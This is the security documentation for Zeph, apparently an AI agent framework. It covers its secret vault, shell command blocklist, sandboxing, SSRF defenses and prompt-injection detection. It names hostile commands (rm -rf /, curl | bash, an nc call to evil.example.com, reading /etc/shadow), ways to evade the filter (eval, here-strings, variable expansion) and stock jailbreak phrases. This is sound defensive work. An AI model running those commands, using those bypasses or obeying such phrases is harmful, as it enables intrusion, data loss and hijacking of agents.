Security

Zeph implements defense-in-depth security for safe AI agent operations in production environments.

Age Vault

Zeph can store secrets in an age-encrypted vault file instead of environment variables. This is the recommended approach for production and shared environments.

Setup

zeph vault init                        # generate keypair + empty vault
zeph vault set ZEPH_CLAUDE_API_KEY sk-ant-...
zeph vault set ZEPH_TELEGRAM_TOKEN 123456:ABC...
zeph vault list                        # show stored keys
zeph vault get ZEPH_CLAUDE_API_KEY     # retrieve a value
zeph vault rm ZEPH_CLAUDE_API_KEY      # remove a key

Enable the vault backend in config:

[vault]
backend = "age"

The vault file path defaults to ~/.zeph/vault.age. The private key path defaults to ~/.zeph/key.txt.

Custom Secrets

Beyond built-in provider keys, you can store arbitrary secrets for skill authentication using the ZEPH_SECRET_ prefix:

zeph vault set ZEPH_SECRET_GITHUB_TOKEN ghp_yourtokenhere
zeph vault set ZEPH_SECRET_STRIPE_KEY sk_live_...

Skills declare which secrets they require via x-requires-secrets in their frontmatter. Skills with unsatisfied secrets are excluded from the prompt automatically — they will not be matched or executed until the secret is available.

When a skill with x-requires-secrets is active, its secrets are injected as environment variables into shell commands it runs. The prefix is stripped and the name is uppercased:

Vault key	Env var injected
`ZEPH_SECRET_GITHUB_TOKEN`	`GITHUB_TOKEN`
`ZEPH_SECRET_STRIPE_KEY`	`STRIPE_KEY`

Only the secrets declared by the currently active skill are injected — not all vault secrets.

See Add Custom Skills — Secret-Gated Skills for how to declare requirements in a skill.

Docker

Mount the vault and key files as read-only volumes:

volumes:
  - ~/.zeph/vault.age:/home/zeph/.zeph/vault.age:ro
  - ~/.zeph/key.txt:/home/zeph/.zeph/key.txt:ro

File Permissions

All sensitive files created by Zeph are now protected with mode 0600 (owner read/write only), independent of the process umask. This ensures your secrets are never accidentally readable by other users on the system.

Protected files include:

Vault files (~/.zeph/vault.age, ~/.zeph/key.txt)
SQLite databases (conversation history, embeddings, metrics)
Debug dumps (when enabled)
Audit logs (tool execution records, JSONL format)
Configuration files (config.toml, router state, ACP permissions)
MCP server list (mcpls.toml)

Checking permissions manually:

ls -la ~/.zeph/vault.age   # Should show: -rw------- (mode 0600)
ls -la ~/.zeph/key.txt     # Should show: -rw------- (mode 0600)

Run zeph doctor to verify file modes are correct across all sensitive Zeph files.

Plugin Manifest Integrity

Zeph records a sha256 digest of each installed plugin’s .plugin.toml manifest and verifies it at startup and during hot-reload. The integrity registry is stored in ~/.local/share/zeph/.plugin-integrity.toml (outside the plugins directory to prevent TOCTOU races).

Protection scope:

Detects if a plugin manifest has been modified outside of Zeph’s control (e.g., accidentally edited, maliciously replaced)
Missing entries from pre-feature installs are permitted with a debug-level log
Mismatches cause the plugin to be skipped with an “integrity mismatch” reason visible in zeph plugin list --overlay

To re-protect after a valid change:

zeph plugin remove <name>
zeph plugin add /path/to/<name>

This stores a fresh digest, allowing the plugin to load normally.

Known limits:

Not cryptographically signed — prevents accidental corruption but not determined adversaries
Concurrent installs may race (last writer wins on the .plugin-integrity.toml file)

Shell Command Filtering

All shell commands from LLM responses pass through a security filter before execution. Shell command detection uses a tokenizer-based pipeline that splits input into tokens, handles wrapper commands (e.g., env, nohup, timeout), and applies word-boundary matching against blocked patterns. This replaces the prior substring-based approach for more accurate detection with fewer false positives. Commands matching blocked patterns are rejected with detailed error messages.

12 blocked patterns by default:

Pattern	Risk Category	Examples
`rm -rf /`, `rm -rf /*`	Filesystem destruction	Prevents accidental system wipe
`sudo`, `su`	Privilege escalation	Blocks unauthorized root access
`mkfs`, `fdisk`	Filesystem operations	Prevents disk formatting
`dd if=`, `dd of=`	Low-level disk I/O	Blocks dangerous write operations
`curl \| bash`, `wget \| sh`	Arbitrary code execution	Prevents remote code injection
`nc`, `ncat`, `netcat`	Network backdoors	Blocks reverse shell attempts
`shutdown`, `reboot`, `halt`	System control	Prevents service disruption

Configuration:

[tools.shell]
timeout = 30
blocked_commands = ["custom_pattern"]  # Additional patterns (additive to defaults)
allowed_paths = ["/home/user/workspace"]  # Restrict filesystem access
allow_network = true  # false blocks curl/wget/nc
confirm_patterns = ["rm ", "git push -f"]  # Destructive command patterns

Custom blocked patterns are additive — you cannot weaken default security. Matching is case-insensitive.

Subshell Detection

The blocklist scanner detects blocked commands wrapped inside subshell constructs. The tokenizer extracts the command token from backtick substitution (`cmd`), $(cmd), <(cmd), and >(cmd) process substitution forms. A blocked command name within any of these constructs is rejected before the shell sees it.

For example, `sudo rm -rf /`, $(sudo rm -rf /), <(sudo cat /etc/shadow), and >(nc evil.example.com) are all blocked when sudo, rm -rf /, or nc appear in the blocklist.

Known Limitations

find_blocked_command operates on tokenized command text and cannot detect blocked commands embedded inside indirect execution constructs:

Construct	Example	Why it bypasses
Here-strings	`bash <<< 'sudo rm -rf /'`	The payload string is opaque to the filter
`eval` / `bash -c` / `sh -c`	`eval 'sudo rm -rf /'`	String argument is not parsed
Variable expansion	`cmd=sudo; $cmd rm -rf /`	Variables are not resolved during tokenization

Mitigation: The default confirm_patterns in ShellConfig include <(, >(, <<<, eval , $(, and ` — commands containing these constructs trigger a confirmation prompt before execution. For high-security deployments, complement this filter with OS-level sandboxing (Linux namespaces, seccomp, or similar).

Shell Sandbox

Commands are validated against a configurable filesystem allowlist before execution:

allowed_paths = [] (default) restricts access to the working directory only
Paths are canonicalized to prevent traversal attacks (../../etc/passwd)
Relative paths containing .. segments are rejected before canonicalization as an additional defense layer
allow_network = false blocks network tools (curl, wget, nc, ncat, netcat)

Destructive Command Confirmation

Commands matching confirm_patterns trigger an interactive confirmation before execution:

CLI: y/N prompt on stdin
Telegram: inline keyboard with Confirm/Cancel buttons
Default patterns: rm, git push -f, git push --force, drop table, drop database, truncate, $(, `, <(, >(, <<<, eval
Configurable via tools.shell.confirm_patterns in TOML

File Executor Sandbox

FileExecutor enforces the same allowed_paths sandbox as the shell executor for all file operations (read, write, edit, glob, grep).

Path validation:

All paths are resolved to absolute form and canonicalized before access
Absolute paths are rejected when the operation is not explicitly authorized (e.g., the /image slash command rejects absolute paths like /etc/passwd and only permits relative paths)
Non-existing paths (e.g., for write) use ancestor-walk canonicalization: the resolver walks up the path tree to the nearest existing ancestor, canonicalizes it, then re-appends the remaining segments. This prevents symlink and .. traversal on paths that do not yet exist on disk
If the resolved path does not fall under any entry in allowed_paths, the operation is rejected with a SandboxViolation error

Glob and grep enforcement:

glob results are post-filtered: matched paths outside the sandbox are silently excluded
grep validates the search root directory before scanning begins

Configuration is shared with the shell sandbox:

[tools.shell]
allowed_paths = ["/home/user/workspace"]  # Empty = cwd only

File Read Sandbox

The [tools.file] section exposes per-path glob filters that are applied independently of the allowed_paths filesystem sandbox. They operate on the canonicalized absolute path, making them symlink-safe.

Evaluation order: deny first, then allow.

Field	Purpose
`deny_read`	Glob patterns that are always blocked. Evaluated before `allow_read`.
`allow_read`	Glob patterns that are permitted even when a `deny_read` rule would match. Empty list means “allow all paths that are not denied.”

If a path matches deny_read and does not match allow_read, the read is rejected with a SandboxViolation error. If deny_read is empty, no paths are blocked (the allow list has no effect).

Example — block secrets, allow a single public file:

[tools.file]
deny_read  = ["**/.env", "**/secrets/**", "**/*.key"]
allow_read = ["/home/user/projects/**"]

In this configuration, any .env file under any directory is denied. Paths under /home/user/projects/ are permitted even if they would otherwise match a deny pattern.

Paths are canonicalized before matching, so symlinks that resolve outside the allow list or into a denied path are correctly blocked.

MCP Tool Name Collision

Each MCP tool is identified internally by a sanitized_id derived from its qualified_name (server_id:tool_name). The colon and any characters outside [a-zA-Z0-9_-] are replaced with _. This means two different (server_id, tool_name) pairs can produce the same sanitized_id — for example, a.b:c and a:b_c both sanitize to a_b_c.

Detection: Zeph runs detect_collisions against the full tool list whenever servers are loaded or a new server is added. Every collision pair is reported at WARN level:

WARN zeph_mcp: MCP tool sanitized_id collision: 'a_b_c' shadows 'a:b_c' — executor will always dispatch to the first-registered tool

Resolution: The first-registered tool wins dispatch. Subsequent tools with the same sanitized_id are unreachable — the executor cannot route calls to them.

Security implication: A malicious or misconfigured MCP server could register a tool whose sanitized_id collides with a trusted server’s tool, causing the trusted tool to become unreachable. Zeph does not silently allow this: the collision is logged with both the qualified_name and trust level of each conflicting tool so the operator can identify and remove the offending server.

Mitigation: Choose server IDs that are unique and do not produce overlapping sanitized names. If two legitimate servers expose tools with colliding names, rename one server’s ID in the Zeph config:

[[mcp.servers]]
id = "github-primary"   # unique prefix prevents sanitized_id collision
command = "npx"
args = ["-y", "@modelcontextprotocol/server-github"]

Autonomy Levels

The security.autonomy_level setting controls the agent’s tool access scope:

Level	Tools Available	Confirmations
`readonly`	`read`, `find_path`, `list_directory`, `grep`, `web_scrape`, `fetch`	N/A (write tools hidden)
`supervised`	All tools per permission policy	Yes, for destructive patterns
`full`	All tools	No confirmations

Default is supervised. In readonly mode, write-capable tools are excluded from the LLM system prompt and rejected at execution time (defense-in-depth).

[security]
autonomy_level = "supervised"  # readonly, supervised, full

Permission Policy

The [tools.permissions] config section provides fine-grained, pattern-based access control for each tool. Rules are evaluated in order (first match wins) using case-insensitive glob patterns against the tool input. See Tool System — Permissions for configuration details.

Key security properties:

Tools with all-deny rules are excluded from the LLM system prompt, preventing the model from attempting to use them
Legacy blocked_commands and confirm_patterns are auto-migrated to equivalent permission rules when [tools.permissions] is absent
Default action when no rule matches is Ask (confirmation required)

Audit Logging

Structured JSON audit log for all tool executions:

[tools.audit]
enabled = true
destination = ".zeph/data/audit.jsonl"  # or "stdout"

Each entry includes timestamp, tool name, command, result (success/blocked/error/timeout), and duration in milliseconds.

Secret Redaction

LLM responses are scanned for secret patterns using compiled regexes before display:

Detected prefixes: sk-, AKIA, ghp_, gho_, xoxb-, xoxp-, sk_live_, sk_test_, -----BEGIN, AIza (Google API), glpat- (GitLab), hf_ (HuggingFace), npm_ (npm), dckr_pat_ (Docker)
Regex-based matching replaces detected secrets with [REDACTED], preserving original whitespace formatting
Enabled by default (security.redact_secrets = true), applied to both streaming and non-streaming responses

Credential Scrubbing in Context

In addition to output redaction, Zeph scrubs credential patterns from conversation history before injecting it into the LLM context window. The scrub_content() function in the context builder detects the same secret prefixes and replaces them with [REDACTED]. This prevents credentials that appeared in past messages from leaking into future LLM prompts.

[memory]
redact_credentials = true  # default: true

This is independent of security.redact_secrets — output redaction sanitizes LLM responses, while credential scrubbing sanitizes LLM inputs from stored history.

Config Validation

Config::validate() enforces upper bounds at startup to catch configuration errors early:

memory.history_limit <= 10,000
memory.context_budget_tokens <= 1,000,000 (when non-zero)
agent.max_tool_iterations <= 100
a2a.rate_limit > 0
gateway.rate_limit > 0
gateway.max_body_size <= 10,485,760 (10 MiB)

The agent exits with an error message if any bound is violated.

Timeout Policies

Configurable per-operation timeouts prevent hung connections:

[timeouts]
llm_seconds = 120       # LLM chat completion
embedding_seconds = 30  # Embedding generation
a2a_seconds = 30        # A2A remote calls

A2A and Gateway Bearer Authentication

Both the A2A server and the HTTP gateway use bearer token authentication backed by constant-time comparison (subtle::ConstantTimeEq) to prevent timing side-channel attacks.

A2A Server

Configure via config.toml or environment variable:

[a2a]
auth_token = "secret"  # or use vault: ZEPH_A2A_AUTH_TOKEN

The /.well-known/agent.json endpoint is intentionally public and bypasses auth to allow agent discovery.

If auth_token is None at startup, the server logs a WARN-level message:

WARN zeph_a2a: A2A server started without auth_token — endpoint is unauthenticated

HTTP Gateway

Configure via config.toml or environment variable:

[gateway]
auth_token = "secret"  # or use vault: ZEPH_GATEWAY_TOKEN

The ACP HTTP GET /health endpoint is intentionally public and bypasses auth so IDEs can poll server readiness before authenticating or opening a session.

If auth_token is None at startup, the server logs a WARN-level message:

WARN zeph_gateway: Gateway started without auth_token — endpoint is unauthenticated

Recommendation: Always set auth_token when binding to a non-loopback interface. Use the Age Vault to store the token rather than embedding it in plain text in config.toml.

SSRF Protection for Web Scraping

WebScrapeExecutor defends against Server-Side Request Forgery (SSRF) at every stage of a request, including multi-hop redirect chains.

URL Validation

Before any network connection is made, validate_url checks:

HTTPS only: HTTP, file://, javascript:, data:, and all other schemes are rejected with ToolError::Blocked.
Private hostnames: The following hostname patterns are blocked regardless of DNS resolution:
- localhost and *.localhost subdomains
- *.internal TLD (cloud/Kubernetes internal DNS)
- *.local TLD (mDNS/Bonjour)
- IPv4 literals in RFC 1918 ranges (10.x.x.x, 172.16–31.x.x, 192.168.x.x)
- IPv4 link-local (169.254.x.x), loopback (127.x.x.x), unspecified (0.0.0.0), and broadcast (255.255.255.255)
- IPv6 loopback (::1), link-local (fe80::/10), unique-local (fc00::/7), and unspecified (::)
- IPv4-mapped IPv6 addresses (::ffff:x.x.x.x) — the inner IPv4 is checked against all private ranges above

DNS Rebinding Prevention

After URL validation, resolve_and_validate performs a DNS lookup and checks every returned IP address against the same private-range rules. The validated socket addresses are then pinned to the reqwest client via resolve_to_addrs, eliminating the TOCTOU window between DNS validation and the actual TCP connection.

If DNS resolves to a private IP, the request is rejected with:

ToolError::Blocked { command: "SSRF protection: private IP <ip> for host <host>" }

Redirect Chain Defense

WebScrapeExecutor disables reqwest’s automatic redirect following (redirect::Policy::none()). Redirects are followed manually, up to a limit of 3 hops. For every redirect:

The Location header value is extracted.
Relative URLs are resolved against the current request URL.
validate_url runs on the resolved target — blocking private hostnames and non-HTTPS schemes.
resolve_and_validate runs on the target — blocking DNS-based rebinding.
A new reqwest client is built, pinned to the validated addresses for the next hop.

This prevents the classic “open redirect to internal service” SSRF bypass: even if the initial URL passes validation, a redirect to https://169.254.169.254/ (AWS metadata endpoint) or https://10.0.0.1/ is blocked before the connection is made.

If more than 3 redirects occur, the request fails with ToolError::Execution("too many redirects").

A2A Network Security

TLS enforcement: a2a.require_tls = true rejects HTTP endpoints (HTTPS only)
SSRF protection: a2a.ssrf_protection = true blocks private IP ranges (RFC 1918, loopback, link-local) via DNS resolution
Payload limits: a2a.max_body_size caps request body (default: 1 MiB)

Safe execution model:

Commands parsed for blocked patterns, then sandbox-validated, then confirmation-checked
Timeout enforcement (default: 30s, configurable)
Full errors logged to system; user-facing messages pass through sanitize_paths() which replaces absolute filesystem paths (/home/, /Users/, /root/, /tmp/, /var/) with [PATH] to prevent information disclosure
Audit trail for all tool executions (when enabled)

Container Security

Security Layer	Implementation	Status
Base image	Oracle Linux 9 Slim	Production-hardened
Vulnerability scanning	Trivy in CI/CD	0 HIGH/CRITICAL CVEs
User privileges	Non-root `zeph` user (UID 1000)	Enforced
Attack surface	Minimal package installation	Distroless-style

Continuous security:

Every release scanned with Trivy before publishing
Automated Dependabot PRs for dependency updates
cargo-deny checks in CI for license/vulnerability compliance

Secret Memory Hygiene

Zeph uses the zeroize crate to ensure that secret material is erased from process memory as soon as it is no longer needed.

Secret type:

#![allow(unused)]
fn main() {
// Internal representation — wraps Zeroizing<String> instead of plain String
Secret(Zeroizing<String>)
}

Zeroizing<T> implements Drop to overwrite heap memory with zeros before deallocation, preventing secrets from lingering in freed pages.

AgeVaultProvider:

All decrypted values in the in-memory secrets map are stored as BTreeMap<String, Zeroizing<String>>. Using BTreeMap instead of HashMap ensures that secrets are serialized in deterministic key order when vault.save() re-encrypts the vault. This makes repeated save operations produce consistent JSON output, which is important for diffing and auditing encrypted vault changes. Key-file content and intermediate decrypt buffers are also wrapped in Zeroizing so they are cleared when the local binding is dropped.

Clone intentionally removed:

Secret no longer derives Clone. This is a deliberate trade-off: preventing accidental cloning reduces the number of live copies of a secret value in memory at any given time.

If you need to pass a secret to a function, accept &Secret or extract the inner &str directly rather than cloning.

VIGIL Intent-Anchoring Gate

VIGIL is a pre-sanitizer tripwire that scans tool outputs for prompt injection patterns before they reach the LLM context. It operates independently of the DeBERTa/AlignSentinel/TurnCausalAnalyzer stack and uses regex-based pattern matching for low-latency detection.

Configuration

[security.vigil]
enabled = true                          # Master switch (default: true)
strict_mode = false                     # Deny on any pattern match; false = log + sanitize (default: false)
exempt_tools = ["read_file", "shell"]   # Tools exempt from VIGIL checks (default: ["load_skill", "invoke_skill"])
extra_patterns = []                     # Additional regex patterns to detect (must compile without ReDoS risk)

Behavior

Block mode (strict_mode = true): Replace flagged content with a sentinel value and log the event
Sanitize mode (strict_mode = false, default): Truncate flagged content at the injection point and append an annotation note like [Injection-flagged content truncated by VIGIL]
Exempt tools: Tools in the exempt_tools list skip VIGIL checks entirely (useful for tools that legitimately process untrusted content)
Subagents: Sub-agent responses bypass VIGIL checks to avoid cascading denials

Pattern Detection

VIGIL scans for common prompt injection markers:

Prompt switching cues: “ignore previous instructions”, “pretend you are”, “you are now”
System prompt leaks: “system:”, “instructions:”, “as an AI assistant”
Jailbreak attempts: “DAN”, “do anything now”, “roleplay”
Role assumption: “act as”, “respond as if”, “in the role of”

User-supplied extra patterns are validated for ReDoS resistance (DFA and regex size limits enforced at config validation time).

Egress Network Logging

When the web scrape tool makes outbound HTTP requests, Zeph records each request to an audit trail with:

Request timestamp and correlation ID
Target domain and HTTP method
Response status code and latency
Whether content was flagged by VIGIL

Access the audit trail via view:cost command palette entry or manually in the metrics.

Indirect Prompt Injection (IPI) Defense

Zeph includes a multi-layer defense against indirect prompt injection — malicious instructions embedded in tool outputs, web pages, or MCP server responses that attempt to hijack the agent’s behavior.

Detection Pipeline

Three classifiers operate in sequence on every piece of external content before it enters the LLM context:

Classifier	Method	Purpose
DeBERTa soft-signal	Local NER model (feature-gated)	Fast token-level detection of injection patterns
AlignSentinel (3-class)	Lightweight LLM classifier	Classifies content as `safe`, `suspicious`, or `malicious`
TurnCausalAnalyzer	Heuristic + LLM	Detects whether a tool output is attempting to influence subsequent agent actions

When any classifier flags content as malicious, the content is quarantined before reaching the LLM. Suspicious content is passed through with a warning annotation. The DeBERTa classifier requires the candle feature; without it, detection falls back to regex patterns and the LLM classifiers.

Cross-Tool Injection Correlation

Zeph tracks injection signals across consecutive tool calls within a single turn. If multiple tool outputs in the same turn contain injection indicators, the correlation engine escalates the severity — even if individual signals are below the blocking threshold. This defends against split-payload attacks where malicious instructions are distributed across multiple tool responses.

MCP/A2A Security Hardening

Tool collision detection: when multiple MCP servers expose tools with the same name, Zeph detects the collision and either prefixes with the server ID or blocks the duplicate
SMCP lifecycle: Secure MCP session lifecycle management with token-based authentication for dynamic server connections
IBCT tokens: Identity-Bound Capability Tokens for A2A agent authentication
MCP to ACP confused-deputy enforcement: prevents MCP tool results from being used to bypass ACP permission boundaries

Credential Environment Scrubbing

Shell commands executed by the agent run in a scrubbed environment. Variables matching credential patterns (API keys, tokens, passwords) are removed from the subprocess environment before execution. This prevents skills or tool calls from exfiltrating secrets via environment variable inspection.

PII Protection

PII detection unions three independent layers before redacting tool outputs, so a gap in one layer is covered by the others:

Regex filter ([security.pii_filter]): email, phone, SSN, and credit card patterns, plus an opt-in (filter_names, default false) capitalized-word-sequence heuristic that flags runs of 2+ consecutive ASCII Titlecase tokens as candidate personal names — a compensating control for cases the NER model misses in free-text prose. This heuristic is high-recall but lower-precision: it also flags common two-word technical/product terms (e.g. “Docker Compose”, “Pull Request”), so it defaults off and is not force-enabled on existing installs by --migrate-config.
NER classifier ([classifiers], pii_enabled): a configurable Candle/DeBERTa-backed model (default iiiorg/piiranha-v1-detect-personal-information) that identifies structured and unstructured PII entities. A circuit breaker protects against runaway cost from paginated reads that trigger repeated PII scans.
NER union-merge classifier ([classifiers], gated on classifiers.enabled and security.pii_filter.enabled): a second NER pass whose spans are merged with the regex filter’s spans before redaction.

All three layers are wired identically across every entry point — CLI, daemon (zeph --daemon), and ACP/IDE sessions — so PII coverage does not silently degrade depending on how the agent is launched.

Code Security

Rust-native memory safety guarantees:

Workspace-level unsafe ban: unsafe_code = "deny" is set in [workspace.lints.rust] in the root Cargo.toml, propagating the restriction to every crate in the workspace automatically. The single audited exception is an #[allow(unsafe_code)]-annotated block behind the candle feature flag for memory-mapped safetensors loading.
No panic in production: unwrap() and expect() linted via clippy
Reduced attack surface: Unused database backends (MySQL) and transitive dependencies (RSA) are excluded from the build
Secure dependencies: All crates audited with cargo-deny
MSRV policy: Rust 1.94+ (Edition 2024) for latest security patches

Reporting Vulnerabilities

Do not open a public issue. Use GitHub Security Advisories to submit a private report.

Include: description, steps to reproduce, potential impact, suggested fix. Expect an initial response within 72 hours.

Keyboard shortcuts

Zeph Documentation